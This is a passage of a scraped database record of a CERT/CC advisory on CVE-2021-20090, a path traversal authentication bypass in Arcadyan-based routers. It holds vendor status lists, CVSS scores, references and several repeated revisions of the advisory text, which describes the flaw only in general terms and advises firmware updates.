Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Linksys Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### MikroTik Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Mitel Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetComm Wireless Limited Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NETGEAR Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### pfSense Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quagga Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quantenna Communications Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ruckus Wireless Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SMC Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TDS Telecom Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Technicolor Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TP-LINK Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ubiquiti Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 61 vendors __View less vendors __\n\n \n\n\n### References\n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n * <https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-10-07 20:26 UTC \n**Document Revision: ** | 15 \n", "published": "2021-07-20T00:00:00", "modified": "2021-10-07T20:26:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.kb.cert.org/vuls/id/914124", "reporter": "CERT", "references": ["https://www.tenable.com/security/research/tra-2021-13", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.buffalo.jp/news/detail/20210427-03.html", "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2"], "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "immutableFields": [], "lastseen": "2021-10-07T20:49:58", "history": [{"bulletin": {"id": "VU:914124", "hash": "f97bb9f3fe47b73a8e94622cf8bf9add", "type": "cert", "bulletinFamily": "info", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information \n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Buffalo Technology Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n \n\n\n### References \n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-07-20 20:21 UTC \n**Document Revision: ** | 1 \n", "published": "2021-07-20T00:00:00", "modified": "2021-07-20T20:21:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://www.kb.cert.org/vuls/id/914124", "reporter": "CERT", "references": ["https://www.tenable.com/security/research/tra-2021-13", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090"], "cvelist": ["CVE-2021-20090"], "immutableFields": [], "lastseen": "2021-07-20T20:48:21", "history": [], "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090"]}], "modified": "2021-07-20T20:48:21", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-07-20T20:48:21", "rev": 2}}, "objectVersion": "1.5"}, "lastseen": "2021-07-20T20:48:21", "differentElements": ["cvss2", "cvss3"], "edition": 1}, {"bulletin": {"id": "VU:914124", "hash": "370b7c16f3e6cb62c43e6507a4c5817e", "type": "cert", "bulletinFamily": "info", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information \n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Buffalo Technology Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n \n\n\n### References \n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-07-20 20:21 UTC \n**Document Revision: ** | 1 \n", "published": "2021-07-20T00:00:00", "modified": "2021-07-20T20:21:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.kb.cert.org/vuls/id/914124", "reporter": "CERT", "references": ["https://www.tenable.com/security/research/tra-2021-13", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090"], "cvelist": ["CVE-2021-20090"], "immutableFields": [], "lastseen": "2021-07-28T14:48:26", "history": [], "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090"]}], "modified": "2021-07-28T14:48:26", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-07-28T14:48:26", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-07-28T14:48:26", "differentElements": ["description", "modified", "references"], "edition": 2}, {"bulletin": {"id": "VU:914124", "hash": "1500a38f9377ab5a7836cc251d0c11aa", "type": "cert", "bulletinFamily": "info", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information \n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n \n\n\n### References \n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-08-03 15:00 UTC \n**Document Revision: ** | 2 \n", "published": "2021-07-20T00:00:00", "modified": "2021-08-03T15:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.kb.cert.org/vuls/id/914124", "reporter": "CERT", "references": ["https://www.tenable.com/security/research/tra-2021-13", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.buffalo.jp/news/detail/20210427-03.html"], "cvelist": ["CVE-2021-20090"], "immutableFields": [], "lastseen": "2021-08-03T17:48:45", "history": [], "viewCount": 15, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090"]}], "modified": "2021-08-03T17:48:45", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-08-03T17:48:45", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-08-03T17:48:45", "differentElements": ["description", "modified", "references"], "edition": 3}, {"bulletin": {"id": "VU:914124", "hash": "4f63fa3b1b713b81979c114c3be61ea7", "type": "cert", "bulletinFamily": "info", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information \n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n \n\n\n### References \n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n * <https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-08-04 12:30 UTC \n**Document Revision: ** | 3 \n", "published": "2021-07-20T00:00:00", "modified": "2021-08-04T12:30:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.kb.cert.org/vuls/id/914124", "reporter": "CERT", "references": ["https://www.tenable.com/security/research/tra-2021-13", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.buffalo.jp/news/detail/20210427-03.html", "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2"], "cvelist": ["CVE-2021-20090"], "immutableFields": [], "lastseen": "2021-08-04T14:48:45", "history": [], "viewCount": 35, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}], "modified": "2021-08-04T14:48:45", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-08-04T14:48:45", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-08-04T14:48:45", "differentElements": ["description", "modified"], "edition": 4}, {"bulletin": {"id": "VU:914124", "hash": "8f7bea7c0e2d4b9f8d4edbcad4441af1", "type": "cert", "bulletinFamily": "info", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo 